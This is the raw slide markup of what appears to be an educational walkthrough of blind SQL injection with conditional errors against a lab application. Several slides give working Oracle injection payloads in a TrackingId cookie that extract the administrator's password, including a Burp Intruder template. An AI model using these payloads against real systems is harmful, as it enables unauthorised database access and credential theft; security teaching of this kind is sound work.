            <a:ext cx="6100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Query to determine a user called ‘administrator’ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>exists</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t> or not</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="Google Shape;556;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525550" y="510600"/>
            <a:ext cx="61791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 Query to determine User table exists or not</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7" name="Google Shape;557;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525550" y="2600088"/>
            <a:ext cx="61791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Query to determine the length of the password</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8" name="Google Shape;558;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610025" y="3612350"/>
            <a:ext cx="61791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Query to determine the password character by character</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68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="508725" y="522725"/>
            <a:ext cx="8482875" cy="349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69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="816475"/>
            <a:ext cx="8839198" cy="2890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0"/>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74" name="Google Shape;574;p70"/>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575" name="Google Shape;575;p70"/>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76" name="Google Shape;576;p70"/>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7" name="Google Shape;577;p70"/>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78" name="Google Shape;578;p70"/>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9" name="Google Shape;579;p70"/>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80" name="Google Shape;580;p70"/>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81" name="Google Shape;581;p70"/>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82" name="Google Shape;582;p70"/>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83" name="Google Shape;583;p70"/>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84" name="Google Shape;584;p70"/>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85" name="Google Shape;585;p70"/>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86" name="Google Shape;586;p70"/>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87" name="Google Shape;587;p70"/>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588" name="Google Shape;588;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="246775" y="1033475"/>
            <a:ext cx="8342975" cy="282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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1716825" y="454700"/>
            <a:ext cx="5042076" cy="405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a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="219925" y="1589100"/>
            <a:ext cx="8839201" cy="1965312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="599" name="Google Shape;599;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429925" y="916150"/>
            <a:ext cx="6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Result of the attack :</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713225" y="445025"/>
            <a:ext cx="713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Introduction</a:t>
            </a:r>
            <a:endParaRPr u="sng"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="479" name="Google Shape;479;p5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dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What IS BLIND SQL?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="14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Blind SQL injection is a type of security vulnerability in web applications that allows an attacker to manipulate a web application's database by injecting malicious SQL (Structured Query Language) code. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unlike classic SQL injection, where the results of the injection are immediately visible to the attacker, blind SQL injection occurs when the application does not directly return the database query results to the attacker. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Instead, the attacker has to infer information by asking true/false questions and examining the application's responses.</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73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="647625" y="1431075"/>
            <a:ext cx="6895424" cy="2281350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="605" name="Google Shape;605;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1060225" y="814850"/>
            <a:ext cx="6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We may use the filter tab to filter the result based on text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>received</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74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="490050" y="899700"/>
            <a:ext cx="6985476" cy="3344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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258250" y="1050125"/>
            <a:ext cx="8771700" cy="3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Error-based SQL injection refers to cases where an attacker uses error messages to either extract or infer sensitive data from the database. And in case of Blind SQL the attacker induces the application to return a specific error response based on the result of a boolean expression. The attacker  can exploit this in the same way as the conditional responses .</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The website/application we are trying to attack uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows. If the SQL query causes an error, then the application returns a custom error message. Thus injecting different boolean conditions makes no difference to the application's responses. But it is possible to induce the application to return a different response depending on whether a SQL error occurs. We can modify the query following tracking_id so that it causes a database error only if the condition is true. Very often, an unhandled error thrown by the database causes some difference in the application's response, such as an error message. This enables us to infer the truth of the injected condition.</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latin typeface="Vidaloka"/>
              <a:ea typeface="Vidaloka"/>
              <a:cs typeface="Vidaloka"/>
              <a:sym typeface="Vidaloka"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="616" name="Google Shape;616;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258250" y="409775"/>
            <a:ext cx="8611500" cy="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Vidaloka"/>
                <a:ea typeface="Vidaloka"/>
                <a:cs typeface="Vidaloka"/>
                <a:sym typeface="Vidaloka"/>
              </a:rPr>
              <a:t>Blind SQL injection with conditional errors</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Vidaloka"/>
              <a:ea typeface="Vidaloka"/>
              <a:cs typeface="Vidaloka"/>
              <a:sym typeface="Vidaloka"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375625" y="420450"/>
            <a:ext cx="815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When we will change the value of tracking_id and add </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>at the end then an error would be returned.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="622" name="Google Shape;622;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1861025"/>
            <a:ext cx="8839201" cy="1867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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="599725" y="441775"/>
            <a:ext cx="8056800" cy="4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 Now we  to confirm that the server is interpreting the injection as a SQL query i.e. that  the error is a SQL syntax error as opposed to any other kind of error run following queries:-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Query1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t> TrackingId=xyz''</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t> </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This will not return any error. SQL syntax is correct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Query2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>  TrackingId=xyz'||(SELECT '')||'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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Invalid SQL . Error  is returned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Query3:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>TrackingId=xyz'||(SELECT '' FROM dual)||'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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Correct SQL . No error  returned .Indicating “oracle”  database is used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Query4:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>TrackingId=xyz'||(SELECT '' FROM non-real-table-name)||'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Returns error indicating the backend is using some sql query over this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tracking_id</a:t>
            </a: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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="172875" y="537625"/>
            <a:ext cx="8971200" cy="45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               Now verifying that we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t> a ‘users’ table with username = ‘administrator’</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Query5: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||'</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Query6:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>TrackingId=xyz'||(SELECT '' FROM users WHERE username=’administrator’)||'</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="633" name="Google Shape;633;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="447600" y="2234550"/>
            <a:ext cx="8248801" cy="1803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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="591175"/>
            <a:ext cx="9051300" cy="45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              Finding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>the length of the password of username = ‘administrator’</a:t>
            </a:r>
            <a:endParaRPr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             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Query7: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)&gt;1 THEN to_char(1/0) ELSE </a:t>
            </a:r>
            <a:endParaRPr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                             '' END FROM users WHERE username='administrator')||'</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="639" name="Google Shape;639;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="639675" y="2302775"/>
            <a:ext cx="7864649" cy="1671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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202200" y="334900"/>
            <a:ext cx="8739600" cy="12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           </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Query8: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)&gt;20 THEN to_char(1/0)</a:t>
            </a:r>
            <a:endParaRPr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                                ELSE  ''  END FROM users WHERE username='administrator')||'</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>                               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>The length of password is established  as 20</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="645" name="Google Shape;645;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="407650" y="2159850"/>
            <a:ext cx="8280799" cy="166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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22350" y="420450"/>
            <a:ext cx="9099300" cy="439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Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>        Finding the characters in the password of username=’administrator’</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                 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t> Query9: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN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TO_CHAR (1/0) ELSE '' END FROM users WHERE username='administrator')||'</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="651" name="Google Shape;651;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="930525" y="2255875"/>
            <a:ext cx="7480475" cy="1728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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="87500" y="313725"/>
            <a:ext cx="8867700" cy="4392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0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="657" name="Google Shape;657;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76825" y="345750"/>
            <a:ext cx="8921100" cy="14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Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the character at each position to determine its value is very tedious task so we will use the </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>               “Intruder “ tab of Burp Suite  and set two payloads in the previous query as:-</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Query10: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>§1§</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,1)='</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>§a§</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' THEN </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                               TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'</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solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
